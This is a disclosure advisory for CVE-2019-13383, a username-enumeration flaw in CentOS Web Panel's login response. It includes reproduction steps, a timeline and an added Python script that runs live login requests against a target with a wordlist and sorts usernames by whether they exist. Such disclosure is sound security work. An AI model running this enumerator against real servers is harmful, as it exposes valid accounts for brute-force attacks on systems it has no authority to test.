CVE-2019-13383: CentOS-Control-Web-Panel-CVE/CVE-2019-13383.md at master · i3umi3iei3ii/CentOS-Control-Web-Panel-CVE

In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.846, the Login process allows attackers to check whether a username is valid by reading the HTTP response.


Information

Product             : CWP Control Web Panel
Vulnerability Name  : User enumeration on user panel
Version             : 0.9.8.846
Fixed on            : 0.9.8.848
Tested on           : CentOS 7.6.1810 (Core)
Reference           : http://centos-webpanel.com/
                    : https://control-webpanel.com/changelog
CVE-Number          : CVE-2019-13383

Description

The vulnerability allows a remote attacker to check whether a username is valid by reading the HTTP response to a failed login attempt: the response body differs depending on whether the submitted username exists.

Reproduce

The target server has a valid user "user1".
  1. Log in to the user panel with an invalid username and password.
  2. Intercept the request and the response (for example with an intercepting proxy).
  3. If the user does not exist, the server responds with "suspended".
  4. If the user does exist, the server responds with "failed" or with an empty body (depends on version).
  5. Use this difference in responses to brute-force usernames against the server.
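
The following script is an added example, not part of the original advisory or of CWP, showing how the response difference described above works as an enumeration oracle. The classification logic follows the advisory exactly ("suspended" means the username is absent; "failed" or an empty body means it is present). The login path, the form field names and the base URL used by login_attempt() are assumptions: take the real values from the request intercepted in step 2. The SAMPLE_RESPONSES bodies are constructed so the bucketing logic can be exercised offline.

```python
"""Username enumeration via a login response oracle (added example, not CWP code)."""
import sys
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable, List

# Markers from the advisory: unknown user -> "suspended"; known user -> "failed" or empty body.
ABSENT_MARKER = "suspended"
PRESENT_MARKER = "failed"


def classify_response(body: str) -> str:
    """Map a login-failure response body to 'absent', 'present' or 'unknown'.

    An unexpected body is reported as 'unknown' rather than guessed, so that a
    patched server (uniform error text) does not produce false positives.
    """
    text = body.strip().lower()
    if ABSENT_MARKER in text:
        return "absent"
    if text == "" or PRESENT_MARKER in text:
        return "present"
    return "unknown"


def login_attempt(base_url: str, username: str, password: str = "invalid-password",
                  path: str = "/login/index.php", user_field: str = "username",
                  pass_field: str = "password", timeout: int = 10) -> str:
    """Submit one login form POST and return the raw response body.

    ASSUMPTION: path, user_field and pass_field are placeholders; copy them from
    the intercepted login request for the target version.
    """
    data = urllib.parse.urlencode({user_field: username, pass_field: password}).encode()
    req = urllib.request.Request(base_url.rstrip("/") + path, data=data, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError as err:
        # A 4xx/5xx reply still carries a body, and the marker may be in it.
        return err.read().decode("utf-8", errors="replace")


def enumerate_users(candidates: Iterable[str],
                    fetch: Callable[[str], str]) -> Dict[str, List[str]]:
    """Call fetch(username) for each candidate and bucket names by oracle result.

    fetch is injected so the same logic runs against a live host or an offline stub.
    """
    results: Dict[str, List[str]] = {"present": [], "absent": [], "unknown": []}
    for name in candidates:
        results[classify_response(fetch(name))].append(name)
    return results


# Constructed sample replies standing in for a vulnerable server (offline demo only).
SAMPLE_RESPONSES = {
    "user1": "failed",      # existing user, older version
    "root": "",             # existing user, version that returns an empty body
    "nobody": "suspended",  # non-existent user
    "alice": "suspended",   # non-existent user
}


def demo() -> Dict[str, List[str]]:
    """Run the enumerator over the constructed sample replies."""
    return enumerate_users(SAMPLE_RESPONSES.keys(),
                           lambda user: SAMPLE_RESPONSES.get(user, ABSENT_MARKER))


if __name__ == "__main__":
    if len(sys.argv) == 3:
        # usage: python enum.py https://panel.example.test:2083 wordlist.txt
        base, wordlist = sys.argv[1], sys.argv[2]
        with open(wordlist, encoding="utf-8") as fh:
            names = [line.strip() for line in fh if line.strip()]
        outcome = enumerate_users(names, lambda user: login_attempt(base, user))
    else:
        outcome = demo()
    for bucket, found in outcome.items():
        print(f"{bucket:8s} {found}")
```

Run it with no arguments to see the bucketing on the constructed replies; with a base URL and a wordlist it performs one POST per candidate, so rate-limit or lockout behaviour on the target should be checked first. The fix in 0.9.8.848 removes the oracle by making the failed-login response independent of whether the username exists; against such a server every body lands in "unknown" or in a single bucket, which is the expected result.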

Timeline

2019-07-06: Discovered the bug
2019-07-06: Reported to vendor
2019-07-06: Vendor accepted the vulnerability
2019-07-11: The vulnerability has been fixed
2019-07-15: Advisory published

Discovered by

Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
